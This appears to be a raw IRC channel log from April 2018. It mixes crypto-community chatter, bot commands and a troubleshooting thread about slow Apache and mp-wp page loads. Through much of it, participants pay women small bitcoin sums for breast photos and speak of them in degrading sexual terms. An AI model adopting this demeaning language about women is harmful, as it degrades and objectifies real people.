back to the doing-things club btw 1796553;1523473226;asciilifeform;shinohai: any chance of bot return ? 1796554;1523473243;asciilifeform;shinohai: i like tl866 verymuch. yes it worx. 1796555;1523473277;shinohai;I dont want to bring the old bot back tbh, new one isn't finished. But will log into shell and restart for the 500th time shortly 1796556;1523473285;asciilifeform;ty shinohai . 1796557;1523473309;shinohai;shinohai plans on doing same things he always does anyway, with or without here. 1796558;1523473328;asciilifeform;and i will note , folx like to spit on laptopism, but it is a necessary evil, and asciilifeform for one would like to have a reasonably lappy one day that doesn't weigh 3kg and doesn't eat a 150bux battery erry 3months 1796559;1523473350;mircea_popescu;i have special electrics installed in cars to power laptops. 1796560;1523473381;mircea_popescu;we spit on laptopism for some reason we spit on motherhood : to avoid naive heyleeecxen from getting stuck in the glue trap. 1796561;1523473403;ben_vulpes;lobbes: didn't you have a simple process-restarter? 1796562;1523473436;asciilifeform;but observer, ~everybody has a whole shelf of lappies , even 'with spitting' 1796563;1523473453;mircea_popescu;indeed. 1796564;1523473453;shinohai;Don't want to use process restarter on this box ben_vulpes ... if it goes down I'd rather know why. I don't really trust atlantic anymore tbh 1796565;1523473490;shinohai;In fact, I was the one that recommended a solution to lobbes, re: process restarting. 1796566;1523473640;ben_vulpes;shinohai: why does it go down, typicallY/ 1796567;1523473741;shinohai;I seem to have acquired a fan that likes pinging it to death or something. Got to read logs deeper 1796568;1523473821;mircea_popescu;but since i've mentioned good, let it be stated that "Let an ultraintelligent machine be defined as a machine that can far surpass all the intellectual activities of any man however clever. Since the design of machines is one of these intellectual activities, an ultraintelligent machine could design even better machines; there would then unquestionably be an 'intelligence explosion,'" is a self-contradictory definition, entir 1796569;1523473821;mircea_popescu;ely equivalent to "let an ultralarge integer be defined as that integer which is larger than all irrational numbers." 1796570;1523473830;mircea_popescu;no such thing can exist, on either score, and for the same reasons. 1796571;1523473974;lobbes;Re: process restarter, I ended up using a method trinque suggested (in logs somewhere but no time to dig): essentially the bot gets started as a child process to the parent proccess 1796572;1523474012;lobbes;Was simple few lines of bash iirc 1796573;1523474076;shinohai;ah kk. 1796574;1523474182;lobbes;Ah here be relevant thread >> http://btcbase.org/log/2017-09-21#1716536 1796575;1523474182;a111;Logged on 2017-09-21 05:03 lobbes: http://btcbase.org/log/2017-09-20#1716279 << I ended up going this route. 1796576;1523474258;lobbes;Archived script : http://archive.is/W6L5q 1796577;1523475093;mircea_popescu;!!up maximian 1796578;1523475094;deedbot;maximian voiced for 30 minutes. 1796579;1523475110;maximian;hi MP 1796580;1523475114;mircea_popescu;heya 1796581;1523475123;maximian;so I’ve been out of the loop for a long time 1796582;1523475129;mircea_popescu;how come ? 1796583;1523475160;maximian;after S.DICE, I just went into HODL mode and have been mostly enjoying the runup in BTC price 1796584;1523475175;mircea_popescu;trinque try yet again ? 1796585;1523475180;mircea_popescu;maximian aha 1796586;1523475188;maximian;so what happened to mpex? 1796587;1523475209;mircea_popescu;well, proxies went away recently ; working on getting some back for teh ppls. 1796588;1523475224;maximian;cool… so it’s not actually dead? 1796589;1523475228;mircea_popescu;nah. 1796590;1523475239;maximian;nice 1796591;1523475254;maximian;mpex.biz is the correct url? 1796592;1523475272;mircea_popescu;yeh 1796593;1523475278;maximian;k thx 1796594;1523475337;mircea_popescu;np. 1796595;1523475353;mircea_popescu;read the logs, too. a lot of better stuff than just hodling. 1796596;1523475362;maximian;will do 1796597;1523475421;trinque;mircea_popescu: still doesn't want to talk to me on either 1796598;1523475428;mircea_popescu;jesus fuck. 1796599;1523476615;douchebag;hm? 1796600;1523477096;mircea_popescu;in more upbeat news, homemade mango-ginger gelatto with shaved 100% costa rican chocolate atop. my diet is progressing wonderfully. 1796601;1523477503;douchebag;!!up saturn_ 1796602;1523477504;deedbot;saturn_ voiced for 30 minutes. 1796603;1523477517;saturn_;im here to show my tits hehe 1796604;1523477594;douchebag;mircea_popescu is the man who handles that 1796605;1523477609;saturn_;!!register http://p.bvulpes.com/pastes/0qvpT/?raw=true 1796606;1523477612;deedbot;8F578B57149263815191B121BE2B714B46966398 registered as saturn_. 1796607;1523477735;mircea_popescu;heya saturn_ 1796608;1523477744;saturn_;hello!! 1796609;1523477756;mircea_popescu;adcebee7 1796610;1523477797;saturn_;thanks! 1796611;1523478551;mircea_popescu;and in other ancient spyked , http://trilema.com/2016/introducing-permanence/#comment-117166 lol 1796612;1523478933;spyked;owow, that was 2016. took me a year to /join. :\ 1796613;1523478988;mircea_popescu;http://trilema.com/2017/the-strange-case-of-the-red-stapler-and-other-related-stories/ << the year in question. 1796614;1523479157;spyked;at some point I should write about how I stumbled upon Loper OS and got pissed off at all computing and started reading the (at the time #b-a) logs. spoiler alert: I was not in ro at the time, but stuck in "civilized" country, which made me even more furious. 1796615;1523479220;mircea_popescu;ah the importance of civilised countries. 1796616;1523479250;mircea_popescu;saturn_ you just ready ? i'm about to take off. 1796617;1523479267;mircea_popescu;just about* 1796618;1523479316;mircea_popescu;heh 1796619;1523479318;mircea_popescu;!!up saturn_ 1796620;1523479318;deedbot;saturn_ voiced for 30 minutes. 1796621;1523479386;spyked;the more civilized (i.e. fulla overeducated shitheads, to quote zappa) the country, the greater the fury. 1796622;1523479422;mircea_popescu;someone should do a complete zappa colection, incidentally. he's one of the few worthy of the naggum treatment. 1796623;1523479443;mircea_popescu;some of his music is even not bad, also. 1796624;1523479529;mircea_popescu;meanwhile in fetlife lulz, "503 All backends failed or unhealthy" 1796625;1523479627;mircea_popescu;anyway ; bbl. 1796626;1523479628;shinohai;Ye fucked their asses all out the first 2 times I woulda have thought. 1796627;1523479890;trinque;mircea_popescu: ohey it works now 1796628;1523480662;spyked;yeah, zappa is famous among others for having written some of the "most difficult to interpret songs ever". he then started arranging for sequenced instruments (e.g. synclavier), which rendered the whole idea of "difficult to interpret" useless. e.g. https://www.youtube.com/watch?v=OSAd6pC633A (late? baroque compositions arranged for synclavier) 1796629;1523482433;spyked;http://btcbase.org/log/2018-04-11#1796265 <-- hey, no stress at all, I (out of curiosity) explored the verification $thing down to the 2nd level of "rabbit hole" and found nothing there worth being scrutinized. going deeper might reveal some questions, but I'm not gonna go sharpen the machete for "crypto protocols" jungle just to get there. 1796630;1523482433;a111;Logged on 2018-04-11 15:38 mircea_popescu: http://btcbase.org/log/2018-04-11#1796216 << the whole thing is phrased as "asking questions". one can never be in a rabbit hole so deep they can't ask questions. it's not your job to make any determination, so why stress. 1796631;1523482477;asciilifeform;http://btcbase.org/log/2018-04-08#1794067 << ave1 your FG went out (again!) today . 1796632;1523482477;a111;Logged on 2018-04-08 16:20 ave1: asciilifeform: http://p.bvulpes.com/pastes/Chyyv/?raw=true, updated address 1796633;1523482594;spyked;http://btcbase.org/log/2018-04-11#1796272 <-- I'ma examine this cockroach. but tbh, it may be that it's just difficult to be constructive in a http://btcbase.org/log/2018-04-11#1796086 way. for all I know, the thing could be modellable in a simpler way, only they never considered this. imho serious (yet not at all helpful) question if they ever tune in. 1796634;1523482594;a111;Logged on 2018-04-11 15:47 mircea_popescu: http://btcbase.org/log/2018-04-11#1796242 << this is a problem of how you phrase your questions. see, the fundamental, and apparently enduring, cockroach here is that you have an "in-control" mental model you won't diverge from, and it is disabling for your mental process in the following way : you judge "you can't contribute" arbitrarily, and damagingly, in the exact sense contemplated in http://trilema.com/2014/a-conceit-or 1796635;1523482594;a111;Logged on 2018-04-11 04:43 mircea_popescu: and do me a favour -- not in this lambasting tone! 1796636;1523482784;douchebag;hey trinque 1796637;1523482852;douchebag;how much data can be storn in QR codes? 1796638;1523482856;spyked;http://btcbase.org/log/2018-04-11#1796332 <-- but one can, by reading the orig. paper, decompose it into windowses that then can be replaced, e.g. http://trilema.com/2016/the-necessary-prerequisite-for-any-change-to-the-bitcoin-protocol/ . granted, it took me years to peel off the layers of understanding and I'm still not quite there yet, but this is completely different from $formal_verification_devoid_of_meaning. 1796639;1523482856;a111;Logged on 2018-04-11 16:28 mircea_popescu: http://btcbase.org/log/2018-04-11#1796253 << if only. bitcoin would fail the exact same tests today. it's built out of windows basically. 1796640;1523482900;trinque;douchebag: I forget the actual limit, but can always break it up into multiple 1796641;1523482904;asciilifeform;spyked: http://btcbase.org/log/2017-06-01#1664352 << thread 1796642;1523482904;a111;Logged on 2017-06-01 18:14 asciilifeform: a business card printed on a very spartan (100 'dpi' ) press , gives what, 350 x 200 b&w pixels ; 1796643;1523482905;trinque;human-text-sized things 1796644;1523482911;asciilifeform;and somewhere after that i posted a demo 1796645;1523483069;asciilifeform;err, douchebag ^ 1796646;1523483071;asciilifeform;>>> http://btcbase.org/log/2017-11-09#1734767 1796647;1523483071;a111;Logged on 2017-11-09 00:11 asciilifeform: incidentally, quick experiment gives http://www.loper-os.org/pub/512_letter_a.png 1796648;1523483107;asciilifeform;^ 4096bit, reads with standard blastergun 1796649;1523483371;trinque;douchebag: if you're wondering for the girls, pubkey ass tattoo is totally feasible 1796650;1523483385;douchebag;hahaha 1796651;1523484664;asciilifeform;trinque, douchebag : not nearly as permanent as proper tattoo , but low-tech enuff and good for year or 2 -- print a negative and expose under one of those uv lamps that idiots 'suntan' under 1796652;1523484703;asciilifeform;( or even actual sunlight. print in sunscreen cream. then expose.. ) 1796653;1523485719;douchebag;I know a couple tattoo artists 1796654;1523485759;douchebag;ill tattoo a QR code on my ass if a BTC reward is involved + tattoo costs 1796655;1523487351;douchebag;!!up saturn_ 1796656;1523487352;deedbot;saturn_ voiced for 30 minutes. 1796657;1523487358;saturn_;heyyyyyyyy 1796658;1523487365;saturn_;sorry about the wait! 1796659;1523487378;saturn_;roomates were bothering me! 1796660;1523487379;saturn_;https://i.imgur.com/EOa4XG6.jpg 1796661;1523487473;douchebag;mircea_popescu: ^ 1796662;1523487527;douchebag;2015 +mircea_popescu │ heya saturn_ │ _whitelogger 1796663;1523487529;douchebag;2015 +saturn_ │ hello!! │ adlai 1796664;1523487531;douchebag;2015 +mircea_popescu │ adcebee7 │ candi_lustt 1796665;1523487533;douchebag;2016 +saturn_ │ thanks! 1796666;1523487574;trinque;pastefail. 1796667;1523487624;douchebag;yeah i know 1796668;1523487636;douchebag;my client is weird when it comes to that 1796669;1523487813;trinque;iirc one time I pasted an e-mail to my dad in here 1796670;1523487831;douchebag;lol 1796671;1523496349;mircea_popescu;lol 1796672;1523496380;mircea_popescu;!!pay saturn_ 0.02 1796673;1523496388;deedbot;Get your OTP: http://p.bvulpes.com/pastes/WYXlQ/?raw=true 1796674;1523496563;mircea_popescu;trinque o excellent news. so you all ok on that score ? 1796675;1523496676;mircea_popescu;spyked but why would it be difficult in that way ? 1796676;1523496776;mircea_popescu;douchebag qr code it's not one thing, it has like 30 different versions. there's tiny 21 module v1 to > 150 x 150 modules later. a mid sized item is about 3-400 bits. 1796677;1523497019;mircea_popescu;!!up saturn_ 1796678;1523497020;deedbot;saturn_ voiced for 30 minutes. 1796679;1523497735;hanbot;on the mp-wp newsfront, i've a pressed genesis via phf's lastest leftwards/keccak vtools. am waiting on pizarro folks to get apache & mod_rewrite going so i can test it and see to the initial patches it'll need. 1796680;1523500418;trinque;mircea_popescu: sure am, oughta be able to get things squared shortly, couple days 1796681;1523500618;mircea_popescu;nice. ty. 1796682;1523500650;ckang;hey mircea_popescu I had a talk to zx2c4 to try and smooth things over a bit 1796683;1523500678;mircea_popescu;anything good ? 1796684;1523500691;ckang;his worry is that he thinks he will feel indebted to trilema 1796685;1523500704;ckang;Like he will owe something 1796686;1523500718;ckang;if that makes sense? 1796687;1523500747;mircea_popescu;bit weird. 1796688;1523500756;ckang;and he wasnt sure what #trilema is about but saw the 'terrorist' thing in the topic 1796689;1523500758;ckang;and got spooked 1796690;1523500768;mircea_popescu;lol. 1796691;1523500779;ckang;really 1796692;1523500793;mircea_popescu;oh, btw, whatever happened to that trish chick ? did she ever find me my cartoon artist ??? 1796693;1523500819;ckang;ill look for her tonight shes normally on late during the week 1796694;1523500847;asciilifeform;attn folx : zoolag node going down for scheduled maintenance , for next ~12h 1796695;1523500923;trinque;mircea_popescu: gpg IP settings pls? 1796696;1523500927;ckang;mircea_popescu: hes just worried about his nick being associated with a group that calls themselves a terrorist organization, I suggested that he maybe create an alt nick for the purpose of the discussion and also told him it would be a great review of the project since you all know a good bit about the stuff 1796697;1523500962;ckang;but overall seems like a nice guy 1796698;1523500970;mircea_popescu;trinque come again ? 1796699;1523500983;mircea_popescu;ckang i got the same impression. 1796700;1523501002;trinque;what network settings does this thing need? 1796701;1523501012;mircea_popescu;anyway, he can't really "create an alt nick", what, i'm going to give thousands of dollars to random people ? 1796702;1523501038;ckang;yea, need to figure that one out still. 1796703;1523501045;mod6;lol, i didn't even see that the topic changed. 1796704;1523501049;mircea_popescu;trinque i have nfi lmao. 1796705;1523501092;ckang;i just want to see this happen, think it would be good for his stuff from a codebase perspective to have other smart eyes looking over the implementation 1796706;1523501117;mircea_popescu;mod6 http://btcbase.org/log/2018-04-05#1793161 lol 1796707;1523501117;a111;Logged on 2018-04-05 12:29 mircea_popescu: ^ rfc. 1796708;1523501125;trinque;ftr being indebted to trilema is good for you 1796709;1523501144;mircea_popescu;ckang from experience it's a ticket to fame, but anyways. 1796710;1523501171;ckang;well, i can understand his point though. theres a lot of 'proper' types on freenode 1796711;1523501182;mod6;mircea_popescu: nice 1796712;1523501185;ckang;and it does say 'terrorist organization' right when you join ;p 1796713;1523501210;trinque;imagine the honesty. when you get to the state dept, it says state dept. 1796714;1523501213;mircea_popescu;at least this one admits it. usg still trying to claim it's a legitimate state. 1796715;1523501219;mod6;during that little bit of discussion, i think i was homed in on : http://btcbase.org/log/2018-04-05#1793159 1796716;1523501219;a111;Logged on 2018-04-05 04:18 mircea_popescu: lol so in the end ns1/ns2.qntra.net are the pizarro nameservers ? 1796717;1523501354;ckang;anyways it was a good discussion i will follow up with him tomorrow, however removing that phrase from the topic might go a long way in smoothing things over a bit 1796718;1523501442;mircea_popescu;that'd be the day. 1796719;1523501468;asciilifeform;lol reminds me of the d00d who wanted to rename FUCKGOATS 1796720;1523501480;ckang;but i get you too, dont compromise your beliefs to appease 1 person. 1796721;1523501492;mod6;TMSR is the rock that the water breaks upon, not the other way around. 1796722;1523501554;ckang;he was looking for sponsors it sounded like though as he wants to focus on it full time 1796723;1523501648;ckang;cant say i blame him, ive had hobbies turn in to 2nd jobs and it can get pretty stressful 1796724;1523501659;mircea_popescu;indeed. 1796725;1523501723;mircea_popescu;famously, torvalds, also. 1796726;1523501820;ckang;torvalds is a pretty funny guy, some of his rants are great reads 1796727;1523504774;ckang;!!up sashahsas 1796728;1523504775;deedbot;sashahsas voiced for 30 minutes. 1796729;1523504788;ckang;hey sorry didnt see you come in 1796730;1523505202;sashahsas;Hi 1796731;1523505223;sashahsas;At work but have some time to do it if you aren't busy 1796732;1523505277;ckang;you want to talk to mircea_popescu 1796733;1523505597;sashahsas;😄 1796734;1523506562;asciilifeform;!!up britknee 1796735;1523506563;deedbot;britknee voiced for 30 minutes. 1796736;1523506723;mircea_popescu;hm ? 1796737;1523506744;britknee;Hello 1796738;1523506759;mircea_popescu;hi britknee 1796739;1523506773;britknee;Hey dear, I believe you are the one I was told to speak with 1796740;1523506782;britknee;MP 1796741;1523506792;mircea_popescu;yes ? 1796742;1523506814;britknee;Something about random numbers and breast 1796743;1523506822;mircea_popescu;you here to show your tits ? 1796744;1523506828;britknee;Yup! 1796745;1523506834;mircea_popescu;so then why not say so 1796746;1523506849;mircea_popescu;23df00b4 1796747;1523506856;britknee;Sorry, I didn't know it was out in the open 😮 1796748;1523506878;britknee;Neat, let me find something to write with. 1796749;1523507053;mircea_popescu;and in other logs, "CL-Feed-Parser/0.0.00 (SBCL 1.4.5; Linux;" 1796750;1523507135;ckang;!!up sashahsas 1796751;1523507135;deedbot;sashahsas voiced for 30 minutes. 1796752;1523507155;ckang;sashahsas was too but she is @ work, told me she could sneak off and do it though 1796753;1523507186;mircea_popescu;lol. best kind! 1796754;1523507221;ckang;yea it just may take her a minute to do it depending on whats going on 1796755;1523507296;sashahsas;Hey ckang 1796756;1523507302;sashahsas;Hi mircea_popescu 1796757;1523507317;mircea_popescu;how's work ? 1796758;1523507345;mircea_popescu;sashahsas 1ba61222 1796759;1523507378;sashahsas;Intermittent, had a break to check phone though now. 1796760;1523507397;sashahsas;Should have 10 minutes here soon though. 1796761;1523507457;mircea_popescu;cool. 1796762;1523508742;ben_vulpes;dear #trilema is we is an apache prefork club for mod_php? 1796763;1523508750;*;ben_vulpes entirely at sea with this 1796764;1523508762;mircea_popescu;hm ? 1796765;1523508836;mircea_popescu;aand in other imperial wunderwaffen, https://www.youtube.com/watch?v=Uh2ChGFrceM 1796766;1523508846;ben_vulpes;there are a few threading models in apache as i understand it, prefork, worker and event 1796767;1523508900;mircea_popescu;i use workers. 1796768;1523508908;ben_vulpes;mmk 1796769;1523508911;ben_vulpes;thanks mircea_popescu 1796770;1523509251;mircea_popescu;!!up sashahsas 1796771;1523509252;deedbot;sashahsas voiced for 30 minutes. 1796772;1523509254;mircea_popescu;!!up britknee 1796773;1523509255;deedbot;britknee voiced for 30 minutes. 1796774;1523509474;sashahsas;https://usercontent.irccloud-cdn.com/file/T9rgXuh5/image.png 1796775;1523509576;douchebag;oooh 1796776;1523511307;mircea_popescu;!!up sashahsas 1796777;1523511307;deedbot;sashahsas voiced for 30 minutes. 1796778;1523511320;sashahsas;Hey 1796779;1523511329;mircea_popescu;heya. 1796780;1523511335;mircea_popescu;!!pay sashahsas 0.02 1796781;1523511341;deedbot;Get your OTP: http://p.bvulpes.com/pastes/NiS7a/?raw=true 1796782;1523511347;mircea_popescu;what do you work, anyway ? 1796783;1523511352;sashahsas;Hows it going? Have a few minutes here while I finish eating 1796784;1523511362;sashahsas;Hotel, front desk manager 1796785;1523511368;mircea_popescu;haha nice. 1796786;1523511380;sashahsas;Boring lol 1796787;1523511389;sashahsas;But I enjoy the calm 1796788;1523511394;mircea_popescu;one of my slavegirls used to work that actually 1796789;1523511396;mircea_popescu;in a prior life. 1796790;1523511405;sashahsas;Slave girls? 1796791;1523511412;sashahsas;Tell me more 1796792;1523511461;mircea_popescu;well... here, let's show instead http://trilema.com/2018/the-snows-of-ten-years-ago-almost/ 1796793;1523511796;ben_vulpes;okay now for the next wtf: phpinfo returns instantly, i can open a database connection from php and query for the number of tables, but when i use the mp-wp index.php shit slows to a 2.7 second crawl 1796794;1523511913;ben_vulpes;i must actually be too thick to configure an mpwp lamp stack. 1796795;1523511932;mircea_popescu;bizarre. 1796796;1523511990;mircea_popescu;how do you measure the 2.7 second ? 1796797;1523511998;ben_vulpes;moreover i got the same behavior out of the php_fpm and proxy setup last night, but had trouble believing my eyes. now i've reproduced it with mod_php and am just as baffled. 1796798;1523512016;ben_vulpes;time curl -H 'Host: vantucky' localhost 1796799;1523512046;mircea_popescu;does it take just as long for a dummy index.html ? 1796800;1523512104;ben_vulpes;.07s to serve robots.txt, .011s to serve phpinfo, .011s to serve phpinfo with a db connection and query 1796801;1523512126;mircea_popescu;this is nutty. 1796802;1523512184;ben_vulpes;2.7 to serve the index.php from my copy of mp-wp 1796803;1523512225;mircea_popescu;do you have an usable outside url ? 1796804;1523512311;ben_vulpes;stick vantucky into your /etc/hosts and curl it on port 800 1796805;1523512334;ben_vulpes;try phpinfo.php and then index.php 1796806;1523512343;mircea_popescu;something that can go into eg https://tools.pingdom.com/ 1796807;1523512351;ben_vulpes;hmno 1796808;1523512371;mircea_popescu;well, is this 2.7 s to first byte ? or total page load ? 1796809;1523512539;ben_vulpes;.0003 ttfb in both cases 1796810;1523512551;ben_vulpes;per time curl -H 'Host: vantucky' -s -w "Connect: %{time_connect} TTFB: %{time_starttransfer} Total time: %{time_total} \n" localhost:800/phpinfo.php -o /dev/null 1796811;1523512564;mircea_popescu;ok so then, you don;'t have an apache problem. 1796812;1523512583;mircea_popescu;is your mp-wp isntall depending on eg a theme you don't have referencing images that don't exist or w/e ?\ 1796813;1523512590;ben_vulpes;hmmm 1796814;1523512591;mircea_popescu;because that'd add a timeout 1796815;1523512652;mircea_popescu;ah, lol. are you referencing the mp-wp as "localhost:800/whatever/index.php" ? 1796816;1523512685;ben_vulpes;yeah :( 1796817;1523512691;mircea_popescu;item doesn't work that way 1796818;1523512711;mircea_popescu;it must know its own address ; either put it in normally or else i guess edit wp-settings.php to contain your nutty self-reference 1796819;1523512719;ben_vulpes;oh fuckin gross 1796820;1523512733;mircea_popescu;that's what's going on, it tries to find itself and waits for timeout. 1796821;1523512746;ben_vulpes;standby one 1796822;1523513053;ben_vulpes;emplaced, but 2.4s and .0003 ttfb 1796823;1523513132;mircea_popescu;i don't believe it's either apache or mysql. i expect is unhappy interaction between your ad-hoc dns mapping and mp-wp. 1796824;1523513135;mircea_popescu;!!up sashahsas 1796825;1523513136;deedbot;sashahsas voiced for 30 minutes. 1796826;1523513218;ben_vulpes;mircea_popescu: as in actually trying to talk to itself over http? 1796827;1523513222;mircea_popescu;yup. 1796828;1523513244;mircea_popescu;i don't even know that it knows what a port is or what to do with the colon. 1796829;1523513302;ben_vulpes;well it successfully redirects me to the index and the admin login page now when using a consumer browser; not that that's much of an indicator that things aren't deeply fucked within 1796830;1523513328;mircea_popescu;the whole story is whether it waits for a timeout somewhere. 1796831;1523513456;sashahsas;Hey sorry, had a coworker come up and had to put my phone down. 1796832;1523513460;mircea_popescu;lol. 1796833;1523513478;mircea_popescu;!!rate sashahsas 1 receptionislut. 1796834;1523513480;deedbot;Get your OTP: http://p.bvulpes.com/pastes/sqey4/?raw=true 1796835;1523513489;sashahsas;Its a pet peeve of mine, talking to someone and them looking at their phone. 1796836;1523513498;mircea_popescu;srsly. 1796837;1523513516;sashahsas;So many people do it though unfortunately these days. 1796838;1523513535;mircea_popescu;i don't hang out with them. 1796839;1523513540;sashahsas;Some can navigate the entire city looking at a phone screen lol 1796840;1523513576;mircea_popescu;so are you typing all this on a phone keyboard ?! 1796841;1523513591;sashahsas;Cell 1796842;1523513599;sashahsas;Yup 1796843;1523513610;mircea_popescu;i admire your dedication to this craft. 1796844;1523513617;mircea_popescu;i'm generally livid after trying three words. 1796845;1523513645;sashahsas;The right keyboard helps a lot with predictive text 1796846;1523513655;mircea_popescu;my text is impredictible. 1796847;1523513664;sashahsas;😀 1796848;1523513810;mircea_popescu;sashahsas so what's the best palindrome you know ? 1796849;1523513830;trinque;ben_vulpes: vantucky << I can see it 1796850;1523513859;sashahsas;Hmm, that is an actual work? Racecar 1796851;1523513878;mircea_popescu;sashahsas : a man, a plan, a canal : panama! 1796852;1523513886;sashahsas;sashahsas wouldn't count 1796853;1523513910;ben_vulpes;trinque: yeah but i doubt you see it in a reasonable timeframe 1796854;1523513931;trinque;nah I mean the place 1796855;1523513956;mircea_popescu;trinque is this some inside joke i'm missing ? 1796856;1523514002;trinque;ben_vulpes lives in the john deere part of pacific nw 1796857;1523514007;ben_vulpes;yeeeehaw 1796858;1523514008;trinque;this is just the first time I encountered "vantucky" 1796859;1523514056;mircea_popescu;sashahsas let's try it this way then : amanap : lanac-anal panama 1796860;1523514104;ben_vulpes;omg where is the apache listen port configured asciilifeform 1796861;1523514124;sashahsas;Holy crap 1796862;1523514138;sashahsas;Anal panama lol 1796863;1523514144;mircea_popescu;ben_vulpes why don't you just put it in production and then futz with optimisation, like normal people ? do you not know anything about webdev ? 1796864;1523514181;ben_vulpes;i am unsure as to how serious you are being. 1796865;1523514191;mircea_popescu;sashahsas ok, ok, how about this -- amanap : lanac a nalp a nam a 1796866;1523514212;ben_vulpes;ama nap, that sounds good right now 1796867;1523514212;mircea_popescu;ben_vulpes i am being serious. 1796868;1523514220;sashahsas;That hurts my head trying to see it 1796869;1523514227;ben_vulpes;mircea_popescu: 2.7 seconds suxxxxx 1796870;1523514240;mircea_popescu;ben_vulpes it's a NALP not a plan, narf! 1796871;1523514246;mircea_popescu;i mean a nalp not a nap. 1796872;1523514272;ben_vulpes;but also not having .htaccess apparently sucks 1796873;1523514275;ben_vulpes;narf narf narf 1796874;1523514293;mircea_popescu;sashahsas we here at trilema terrorist republic specialize in headhurting & casse-tete chinois. 1796875;1523514332;mircea_popescu;just look how well supplied ben_vulpes is! 1796876;1523514338;sashahsas;I need to download a thesaurus or dictionary to understand that sentence I think 1796877;1523514369;mircea_popescu;sashahsas you don't speak french ? it's how the frenchies say "puzzle". 1796878;1523514396;mircea_popescu;"chinese head-breaker". this makes sense, to them. 1796879;1523514405;sashahsas;Beautiful language but no never learned it. French girls always sound so sexy. 1796880;1523514416;mircea_popescu;do they come there often ? 1796881;1523514444;sashahsas;Nope, just heard them through media, TV, news and such. 1796882;1523514461;mircea_popescu;possibly media girls sound sexy. 1796883;1523514473;sashahsas;Do real ones not? Lol 1796884;1523514487;mircea_popescu;i suppose it depends which. 1796885;1523514502;mircea_popescu;the hot ones, most definitely. 1796886;1523514623;sashahsas;There is also the Cajun style which is pretty interesting. 1796887;1523514633;sashahsas;Creole 1796888;1523514665;mircea_popescu;cooking, you mean ? 1796889;1523514705;sashahsas;No, Louisiana had a french colony at some point I think. 1796890;1523514722;sashahsas;It is some strange english/french hybrid. 1796891;1523514733;mircea_popescu;well, it actually WAS a french colony. all of it. 1796892;1523514764;mircea_popescu;then monroe bought it, hence "the louisiana purchase" 1796893;1523514790;sashahsas;Oh, thats right, I completely forgot about that but the name is familiar. 1796894;1523515061;ckang;!!up britknee 1796895;1523515062;deedbot;britknee voiced for 30 minutes. 1796896;1523515073;britknee;thx luv 1796897;1523515106;britknee;https://usercontent.irccloud-cdn.com/file/WeZV21J7/image.jpg 1796898;1523515867;mircea_popescu;!!pay britknee 0.02 1796899;1523515870;deedbot;Get your OTP: http://p.bvulpes.com/pastes/IleeY/?raw=true 1796900;1523515918;britknee;wow that easy? you want my friends to? lol 1796901;1523515924;mircea_popescu;sure lol 1796902;1523515949;britknee;i dont know if i can get them on irccloud though is only thing 1796903;1523515953;trinque;britknee: it says foob on your boob 1796904;1523515965;britknee;lol it does 1796905;1523515983;mircea_popescu;it's f00b n00b 1796906;1523515985;britknee;is that # random or does it mean anything? 1796907;1523515990;ben_vulpes;hanbot must have some special sauce in her mp-wp 1796908;1523515993;mircea_popescu;britknee so what do you do for a living anyway ? 1796909;1523516017;britknee;bum atm, not homeless but not in school or work 1796910;1523516027;mircea_popescu;lol, is it fun ? 1796911;1523516042;britknee;it is nice being able to do what i want every day 1796912;1523516053;britknee;but being broke isn't so much 1796913;1523516057;mircea_popescu;heh. 1796914;1523516100;britknee;but i have my friends who would show you their tots ! 1796915;1523516116;ben_vulpes;http://p.bvulpes.com/pastes/OaPnf/?raw=true 1796916;1523516165;mircea_popescu;ben_vulpes lmao she smokes ya 1796917;1523516177;britknee;i do not! 1796918;1523516182;mircea_popescu;see, THAT is exactly typical and properly working. 1796919;1523516192;mircea_popescu;britknee no i don't mean you, i mean hanbot. 1796920;1523516210;britknee;o lol 1796921;1523516219;ben_vulpes;ain't all about you sweetie 1796922;1523516231;mircea_popescu;lol. 1796923;1523516237;britknee;y not 😋 lol 1796924;1523516246;britknee;jk 1796925;1523516250;mircea_popescu;speaking of friends, do you have any super talented cartoon artist friends ? 1796926;1523516290;mircea_popescu;anyway ben_vulpes here's where you thank me profusely for having saved you dicking about with entirely nonbroken stacks for an alfternity. 1796927;1523516292;britknee;most of my friends are pretty talentless, one can sign but the rest, nothing special i know of 1796928;1523516298;britknee;sing* 1796929;1523516337;mircea_popescu;britknee with friends like that no wonder you're broke! 1796930;1523516344;ben_vulpes;mircea_popescu: thank you so very very much. 1796931;1523516345;britknee;ikr 1796932;1523516363;mircea_popescu;you're welcome! 1796933;1523516389;britknee;they are all good ppl though who would do anything they could to help me or each other 1796934;1523516395;britknee;that i appreciate 1796935;1523516403;ben_vulpes;i am still flabbergasted that it takes apache 2.7 seconds to render what nginx can do with the fpm pool in a tenth of a second. 1796936;1523516418;ben_vulpes;http://logs.bvulpes.com/pizarro?d=2018-4-12#331710 1796937;1523516418;mimisbrunnr;Logged on 2018-04-12 06:49 ben_vulpes: hanbot danielpbarron: apache with mod_php is, sadly, much slower than the nginx setup we've had until now. however now we can move forward with getting your .htaccess files set up and uploads and such. i'm going to knock off for now but please let me know how i can support your mp-wp projects next. 1796938;1523516454;mircea_popescu;it has nothing to do with apache ; let everyone who isn't hanbot fix their mp-wp 1796939;1523516464;mircea_popescu;ideally by getting her genesis pressed once she puts it out. 1796940;1523516485;ben_vulpes;mircea_popescu: nginx can serve hanbots in .01s, not the .6 of apache 1796941;1523516498;mircea_popescu;yaya. until there's some load on it./ 1796942;1523516509;ben_vulpes;you put those goalposts back 1796943;1523516518;ben_vulpes;but i see i see. 1796944;1523516524;mircea_popescu;heh. mkay, spherical chickens ftw. 1796945;1523516560;mircea_popescu;ben_vulpes do you realise the 0.5 is measured through dns and all that ? did you do same with nginx ? 1796946;1523516610;ben_vulpes;.126s without dns 1796947;1523516622;trinque;somewhere a star printer screeches with the sound of titties. 1796948;1523516637;*;trinque will get to these tomorrow, girls 1796949;1523516896;mircea_popescu;http://trilema.com/2014/ill-pay-for-your-tits/ << and updated with the largest single day slutcrop yet! 1796950;1523516915;mircea_popescu;!!up sashahsas 1796951;1523516916;deedbot;sashahsas voiced for 30 minutes. 1796952;1523516918;mircea_popescu;!!up britknee 1796953;1523516919;deedbot;britknee voiced for 30 minutes. 1796954;1523516928;mircea_popescu;so, any great stories ? 1796955;1523516946;britknee;i feel smarter having read all the stuff above but still have no clue what it means lol 1796956;1523517123;ben_vulpes;awww shit reaction engines limited bezzled boeing and rolls-royce into pouring another pile of bezzlars into the sabre engine 1796957;1523517194;mircea_popescu;ugh 1796958;1523517198;mircea_popescu;say what ? 1796959;1523517243;ben_vulpes;buncha british poofs have a magical ambient-air-breathing-theoretically-up-to-mach-5 rocket engine 